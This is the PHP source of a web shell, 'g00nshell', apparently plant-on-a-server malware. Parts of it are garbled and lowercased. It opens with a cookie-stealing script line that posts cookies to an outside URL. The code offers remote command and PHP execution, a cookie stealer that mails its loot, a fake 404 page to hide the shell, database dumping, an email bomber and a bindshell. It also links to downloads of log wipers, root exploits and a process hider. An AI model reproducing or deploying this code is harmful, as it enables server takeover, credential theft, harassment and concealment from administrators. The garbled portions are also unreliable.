document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies # # # #in the ajax command shell, type 'home' to return to the shell's # #directory. type 'clear' to clear the output screen. # ##########################verification levels######################### #0: no protection; anyone can access # #1: user-agent required # #2: require ip # #3: basic authentication # ##############################known bugs############################## #the sql tool is not complete. there is currently no editing function# #available. some time in the future this may be fixed, but for now # #don't complain to me about it # ################################shouts################################ #pr0be - beta testing & css # #trintitty - beta testing # #clorox - beta testing # #everyone else at g00ns.net # ########################note to administrators######################## #if this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ // configuration $auth = 0; $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent $ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell $email = ""; // e-mail address where cookies will be sent $user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password // global variables $version = '1.4 beta'; $self = $_server['php_self']; $soft = $_server['server_software']; $servinf = split('[:]', $_server['http_host']); $servip = $servinf[0]; $servport = @$servinf[1] ? $servinf[1] : '80'; $cmd = @$_get['cmd']; $act = @$_get['act']; $cmd = @$_get['cmd']; $curdir = cleandir(getcwd()); if(@$_get['dir']){ $dir = $_get['dir']; if($dir != 'nullz') $dir = cleandir($dir); }

$contents = @$_post['contents']; $gf = @$_post['gf']; $img = @$_get['img']; // credits to disruptiv for this bit ;) if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) = explode("&", $_server['request_uri']); else $me = $php_self . "?"; @session_start(); @set_time_limit(5); switch($auth){ // authentication switcher case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break; case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break; case 3: if(!$_server['php_auth_user']) userauth(); break; default: break; } function cleandir($d){ // function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\\\", "\\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // basic authentication function global $user, $pass; header("www-authenticate: basic realm='secure area'"); if(md5($_server['php_auth_user']) != $user || md5($_server['php_auth_pw'] != $pass)) hide(); } function get_exec_function(){ // command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f; } function execute_command($exec_function, $command){ // command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "\n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img && !@$_get['ajxcmd']) main(); elseif(!$act && $cmd){ // raw command execution style(); echo("results:\n
"); if($exec_function = get_exec_function()) execute_command($exec_function, $cmd); else die("all execution methods disabled.");

echo(""); } elseif(@$_get['ajxcmd']){ // command execution for ajax shell if($_get['ajxcmd'] == "home") $_session['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_get['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_get['ajxcmd'])); if(@is_dir($_session['work_dir'] . directory_separator . $c) && $c[0] != '\\' && $c[0] != '//') $_session['work_dir'] .= directory_separator . $c; elseif(@is_dir($c) && $c[0] != '.') $_session['work_dir'] = $c; else echo("invalid directory\n"); } else{ @chdir($_session['work_dir']); execute_command($exec_function, $_get['ajxcmd']); } } else die("all execution methods disabled."); } elseif(@$_get['cookie']){@mail($email, "cookie data", @$_get['cookie'], "from: $email"); hide();} // cookie stealer function elseif($act == 'view' && @$_get['f'] && $dir) view($_get['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // hiding function global $self, $soft, $servip, $servport; header("http/1.0 404 not found"); ?>

not found

the requested url was not found on this server.

additionally, a 404 not found error was encountered while trying to use an errordocument to handle the request.

---

>

<style> body { background-color:#000000; color:white; font-family:verdana; font-size:11px; } h1,h3 { color:white; font-family:verdana; font-size:11px; } input,textarea,select,button { color:#ffffff; background-color:#000000; border:1px solid #4f4f4f; font-family:verdana; font-size:11px; } textarea { font-family:courier; } a { color:#6f6f6f; text-decoration:none; font-family:verdana; font-size:11px; } a:hover { color:#7f7f7f; } td { font-size:12px; vertical-align:middle; } th { font-size:13px; vertical-align:middle; } table { empty-cells:show; } .inf { color:#7f7f7f; } 'command execute','files'=>'file view','phpinfo'=>'php info', 'phpexec'=>'php execute', 'tools'=>'tools','sqllogin'=>'sql','upload'=>'get files','kill'=>'kill shell'); $capt = array_flip($act); echo("

\n"); echo("host: <span class='inf'>$servip
\n"); echo("server software: <span class='inf'>$soft
\n"); echo("uname: <span class='inf'>" . php_uname() . "
\n"); echo("shell directory: <span class='inf'>" . getcwd() . "
\n"); echo("

\n"); echo("current user: <span class='inf'>" . @exec('whoami'). "
\n"); echo("id: <span class='inf'>" . @exec('id') . "
\n"); echo("safemode: " . (@ini_get('safe_mode') ? "on" : "off
\n") . ""); echo("open base dir: " . (@ini_get('open_basedir') != '' ? "[ <span class='inf'>" . ini_get('open_basedir') . " ]" : "off") . "
\n"); echo("disabled functions: <span class='inf'>" . (@ini_get('disable_functions') != '' ? @ini_get('disable_functions') : "none") . "
\n"); echo("mysql: " . (@function_exists(mysql_connect) ? "on" : "off") . "");

?>

more less

links

" . $link . " ] "); ?>

---

<iframe name='frm' style='width:100%; height:65%; border:0;' src=''> <pre style='text-align:center'>:: g00nshell v :: <script> var http = null; function char(e){ if(window.event) k = e.keycode; else if(e.which) k = e.which; if(k == 13){ cmd = document.getelementbyid('c').value; if(cmd == "clear") document.getelementbyid('history').value = ""; else if(document.getelementbyid('c').value != "") exec(cmd); document.getelementbyid('c').value = ""; } } function exec(cmd){ if (window.xmlhttprequest) http = new xmlhttprequest(); else if (window.activexobject) http = new activexobject("microsoft.xmlhttp"); if(http){ http.onreadystatechange = handle_response; http.open("get", "" + cmd, true); http.send(null); } else alert("your browser fails."); } function handle_response(){ if(http.readystate == 4) document.getelementbyid('history').value += "# " + cmd + "\n" + http.responsetext; document.getelementbyid('history').scrolltop = document.getelementbyid('history').scrollheight; }


execute php code"); echo(""); echo(""); if(!@$_post['phpexec']) echo("/*don't include <? ?> tags*/\n"); echo(stripslashes(htmlentities(@$_post['phpexec'])) . "\n
\n"); echo(""); echo("

"); if(@$_post['phpexec']){ echo(""); eval(stripslashes($_post['phpexec'])); echo(""); } } function sqllogin(){ // mysql login function global $me; if(@$_session['isloggedin'] == "true") header("location: " . $me . "&act=sql"); if(@$_post['un'] && @$_post['pw']) header("location: " . $me . "&act=sql"); style(); ?>

user:

password:

host:

port:

\n");

die(sqllogin()); } else $_session['isloggedin'] = "true"; } else die(sqllogin()); if (@$_get['db']){ mysql_select_db($_get['db'], $sqlcon); if(@$_get['sqlquery']){ $dat = mysql_query($_get['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "
\n"); } else if(@$_get['table'] && !@$_get['sqlf']){ echo("insert row

\n"); echo(""); $query = "show columns from " . $_get['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['field']); echo(""); for($i=0;$i" . $row[0] . ""); } echo("\n"); } } $y++; } echo("

" . $fields[$i]); $i++; } $result = mysql_query("select * from " . $_get['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_get['p']) $_get['p'] = 1; if(@$_get['p']){ if($y > (30*($_get['p']-1)) && $y <= 30*($_get['p'])){ echo("

\n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } }

elseif(@$_get['table'] && @$_get['sqlf']){ switch($_get['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_get['sqlf'] = ""; } } else{ echo(""); $query = "show tables from " . $_get['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("\n"); echo("

" . $row[0] . "

[download]

"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("" . $row->database . "
\n"); } mysql_close($sqlcon); } function sqldownload(){ // download sql file function $sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'], $_session['sql_user'], $_session['sql_password']); mysql_select_db($_get['db'], $sqlcon); $query = "show columns from " . $_get['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['field']); $i++; } $result = mysql_query("select * from " . $_get['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$i
}

$out .= ");\n"; } $filename = @$_get['table'] . '-' . time() . '.sql'; header("content-type: application/octet-stream"); header("content-length: " . strlen($out)); header("content-disposition: attachment; filename=$filename;"); echo($out); die();

function sqlinsert(){ style(); $sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'], $_session['sql_user'], $_session['sql_password']); mysql_select_db($_get['db'], $sqlcon); if(@$_post['ins']){ unset($_post['ins']); $fields = array_flip($_post); print_r($_post); $f = implode(",", $fields); $v = implode("','", $_post); $query = "insert into " . $_get['table'] . " (" . $f . ") values ('" . $v . "')"; echo($query); mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error()); die("row inserted.
\ngo back"); } $query = "show columns from " . @$_get['table']; $result = mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error()); $i = 0; $fields = array(); echo("

"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['field']); echo("

" . $fields[$i] . "

\n"); $i++; } echo("

"); echo("
\n"); echo("

"); } function nicesize($size){ if(!$size) return "0 b"; if ($size >= 1073741824) return(round($size / 1073741824) . " gb"); elseif ($size >= 1048576) return(round($size / 1048576) . " mb"); elseif ($size >= 1024) return(round($size / 1024) . " kb"); else return($size . " b"); } function files($dir){ // file manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir;

$dirx = explode(directory_separator, $dir); $files = array(); $folders = array(); echo("

"); echo(""); echo(""); echo("

"); echo("

file list for "); for($i=0;$i$dirx[$i]" . directory_separator); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . directory_separator . $link)){ $file = array(); $color = @is_writable($dir . directory_separator . $link) ? "forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" : "red"); @$file['link'] = "$link"; @$file['icon'] = "folder"; $folder = " ". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . directory_separator . $link)); $color = @is_writable($dir . directory_separator . $link) ? "forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" : "red"); @$file['link'] = "$link"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']='binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon']='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': case 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon']='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case 'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "\n"; }

array_push($files, $file);

} foreach($folders as $folder) echo("\n"); foreach($files as $file) echo($file); echo("

file name	file size
". $file['link'] . "	" . $file['size'] . "
$folder	dir

"); closedir($handle); } } function email(){ // email bomber function global $me; style(); ?>

your address:

their address:

subject:

text:

how many times:

"); echo("go back");

die(); } elseif(@$_post['fileact'] == "delete"){ unlink($filename); echo("deleted file.

"); echo("go back"); die(); } if($dir != "nullz") $filename = $dir . directory_separator . $filename; // heh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("

"); echo(""); echo(htmlentities($content) . "\n"); ?>

output directory


remote upload


local file upload

else die("file upload failed."); } function tools(){ // useful tools function global $me, $curdir; style(); $tools = array( "--- log wipers ---"=>"1", "vanish2.tgz"=>"http://packetstormsecurity.org/unix/penetration/logwipers/vanish2.tgz", "cloak.c"=>"http://packetstormsecurity.org/unix/penetration/logwipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/unix/penetration/logwipers/gh0st.sh", "--- priv escalation ---"=>"2", "h00lyshit - linux 2.6 all"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - bsd v?"=>"http://someshit.net/files/xpl/rootbsd", "--- bindshells ---"=>"3", "thc rwwwshell1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "basic perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- misc ---"=>"4", "mocks socks4 proxy"=>"http://superbeast.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("

"); echo("output directory
"); echo("

"); echo("<select name='gf' style='align:center;'>"); foreach($tools as $tool) echo(is_numeric($tool) ? "\n" : "$names[$tool]\n"); echo(""); echo("
"); echo("

"); echo("
"); echo("bindshell (requires writable directory)
\n"); echo("list domains (requires writable directory)
\n"); echo("e-mail bomber
\n"); } function lookup(){ // domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+\) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // my sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script);

@fclose($handle); echo("

domains

"); echo("

"); $cmd = exec("python lookup.py $servinf[0]", $ret); foreach($ret as $site) echo("
• $site\n"); echo("

"); @unlink('lookup.py'); } function bshell(){ // python bindshell script style(); if(!@$_post['bport']){ ?>

port:

"r0lgodlhewaqalmaaaaaap///5ycam7oy///np//zv/onpf39////waaaaaaaaaaaaa aaaaaaaaaaaaaach5baeaaa" . "galaaaaaatabaaaarremljq7046yp6bxsihevbeakycuprdp7hlxrdeomqcebp/4ychffzgqhh4yr ypb2dolhpikwq" .

"d1pq8yrvvg3qyeh5ryk5rjfafuua3vb4fbibads=", "image"=>"r0lgodlhfaawaomaap////8zm8z//8zmzjmzmwzmzmyaadmzmwczzaczmwazzgaaaaaa aaaaaaaaaaaaach+tlroax" . "mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29 tlcbtzxb0zw1i" . "zxigmtk5nqah+qqbaaacacwaaaaafaawaaaekpdisae4wbzau99hdm1esyyzwxyqogjblacdonryn ssgsby/4gsx6y" . "2oymwq2omqngslbjzlwbm1afsqkyu4a2twywumyt/wltsivgyga/zq3qwu7mmhvh4g8gusfauhch9 5nwmhv4sgh4ed" . "ihoojy8rzpsveiv+mycwhncko6sfm5cliadqrk1pqbljsrnseqa7", "unknown"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0ig lzigluihrozsbwdwjsawmgzg" . "9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa bacwaaaaafaaw" . "aaadadi6vpewdecrnso+atvpeqciamgairhr5xmkgmq1lkomn7ecrjdwp52r0ippjj0kjuaq7sxle +si+9v8vycfim" . "0ilb2o80s8jcfvjjtagyrzypnby5ov6wolpd+xdjqagsq4eucgqqejads=", "binary"=>"r0lgodlhfaawamiaap///8z//8zmzjmzmtmzmwaaaaaaaaaaach+tlroaxmgyxj0igl zigluihrozsbwdwjsawmgzg" . "9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa bacwaaaaafaaw" . "aaadaui6vpeweecrnss+wqoqxseae6lxxgeopqmha+q1rhtfakho/hadnvfo6lmykypkooadim4vj dowkx2xvirugq" . "vavcbuxcn0hke04znriv/roovag3+z63oyo6/uiwlkgyjjoxfdh4htcqa7", "text"=>"r0lgodlhfaawaomaap/////mm/8zm8z//5mzmzlmm2bm/zmzmwaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaach+tlroax" . "mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29 tlcbtzxb0zw1i" . "zxigmtk5nqah+qqbaaadacwaaaaafaawaaaeb/disee4ebzau99hdm1esybzwxekgi5sebg0+2hnt bsccvhamgtxay" . "cositwugg2pyqoqalhoz/qklvv6gkmqm8xxdumzx0yv5ze9s7jdpgtl3me5jhhts/xo3hwdwt0f31 7wwdsi4xrpxlw" . "kugxeqa7", "compressed"=>"r0lgodlhfaawaocaap//////zp//mf//zv//m///ap/m///mzp/mmf/mzv/mm// map+z//+zzp+zmf+zzv+zm/+zap" . "9m//9mzp9mmf9mzv9mm/9map8z//8zzp8zmf8zzv8zm/8zap8a//8azp8amf8azv8am/8aamz//8z /zmz/mcz/zsz/" . "m8z/amzm/8zmzmzmmczmzszmm8zmamyz/8yzzmyzmcyzzsyzm8yzamxm/8xmzmxmmcxmzsxmm8xma mwz/8wzzmwzmc" . "wzzswzm8wzamwa/8wazmwamcwazswam8waajn//5n/zjn/mzn/zpn/m5n/ajnm/5nmzjnmmznmzpn mm5nmajmz/5mz" . "zjmzmzmzzpmzm5mzajlm/5lmzjlmmzlmzplmm5lmajkz/5kzzjkzmzkzzpkzm5kzajka/5kazjkam zkazpkam5kaag" . "b//2b/zgb/mwb/zmb/m2b/agbm/2bmzgbmmwbmzmbmm2bmagaz/2azzgazmwazzmazm2azagzm/2z mzgzmmwzmzmzm" . "m2zmagyz/2yzzgyzmwyzzmyzm2yzagya/2yazgyamwyazmyam2yaadp//zp/zdp/mtp/zjp/mzp/a dpm/zpmzdpmmt" . "pmzjpmmzpmadoz/zozzdozmtozzjozmzozadnm/znmzdnmmtnmzjnmmznmadmz/zmzzdmzmtmzzjm zmzmzadma/zma" . "zdmamtmazjmamzmaaad//wd/zad/mqd/zgd/mwd/aadm/wdmzadmmqdmzgdmmwdmaacz/wczzaczm qczzgczmwczaa" . "bm/wbmzabmmqbmzgbmmwbmaaaz/wazzaazmqazzgazmwazaaaa/waazaaamqaazgaam+4aan0aals aakoaaigaahca" . "afuaaeqaaciaabeaaaduaaddaac7aacqaaciaab3aabvaabeaaaiaaaraaaa7gaa3qaauwaaqgaai aaadwaavqaara" . "aaigaaee7u7t3d3bu7u6qqqoiiihd3d1vvvurerciiihereqaaach+tlroaxmgyxj0iglzigluihr ozsbwdwjsawmg" . "zg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqba

aakacwaaaaafa" . "awaaaimqbjcctbqmdbgqgtdmqfaabdvgojemzi0khehburwrwomgndihwnavjhiqrjjhx/qvz5d+v hafziwmmz8bgh" . "ji9hxqtj4zfamzc1vpxjgkppn0y5cp04m6lpekcn5mxojelrqfy5tm36ngrpqv67op0km6rynkup/ gmq1mdamc1tdn" . "36lijupwjr0psofyurmtjlhitbkqxcgaa7", "sound"=>"r0lgodlhfaawamiaap////8zm8z//8zmzjmzmwyaadmzmwaaach+tlroaxmgyxj0iglz igluihrozsbwdwjsawmgzg" . "9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa cacwaaaaafaaw" . "aaadayi63p4wnsnckoocyvwpb7fxfwmfwgh+dzpynndpnahcw9cvquj8tttrd+g5hmint7a0bpe4z nf6hcqn0iryks" . "0sdn9v0tsc0q4dq1shfrjebrq6fznn5co2jd4yfup7gnysexqlhbijigsjads=", "script"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0igl zigluihrozsbwdwjsawmgzg" . "9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa bacwaaaaafaaw" . "aaadzti6vpewdecrnso+atvpeddvirhvbjcsf8qrmiwobe2fvlrmcyz3o4pgkcdgvmgr0sgzoyvm0 dns/af7ggy1me" . "16v9vxndynf89es2os00brcdw7dvddwe87fjmg+v9dnxbzyw8jads="); header("content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // shell deleter function style(); echo("

"); echo("type 'confirm' to kill the shell:
\n"); echo(""); echo("

"); if(@$_post['ver'] == "confirm"){ $self = basename($_server['php_self']); if(unlink($self)) echo("deleted"); else echo("failed"); } } die(); ?>